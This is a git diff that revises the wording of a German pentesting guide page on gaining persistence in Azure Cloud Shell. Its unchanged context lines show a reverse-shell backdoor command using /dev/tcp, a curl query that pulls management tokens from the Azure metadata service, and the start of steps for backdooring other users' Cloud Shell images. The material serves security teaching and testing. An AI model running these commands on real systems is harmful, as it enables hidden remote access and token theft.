diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md index 08e3622a7..81d91b15c 100644 --- a/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md +++ b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md @@ -15,7 +15,7 @@ echo '(nohup /usr/bin/env /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CC ``` Diese Hintertür kann Befehle sogar 5 Minuten nach dem Abschluss der Cloud-Shell durch den Benutzer ausführen. -Zusätzlich die Metadaten-Dienste von Azure nach Instanzdetails und Tokens abfragen: +Zusätzlich wird der Azure-Metadatenservice nach Instanzdetails und Tokens abgefragt: ```bash curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -s ``` @@ -23,7 +23,7 @@ curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?a Wenn ein Angreifer Bilder anderer Benutzer in einem Storage Account findet, auf den er Schreib- und Lesezugriff hat, kann er das Bild herunterladen, **eine Bash- und PS-Hintertür hinzufügen** und es zurück in den Storage Account hochladen, sodass beim nächsten Zugriff des Benutzers auf die Shell die **Befehle automatisch ausgeführt werden**. -- **Bild herunterladen, Hintertür hinzufügen und hochladen:** +- **Download, Hintertür und Hochladen des Bildes:** ```bash # Download image mkdir /tmp/phishing_img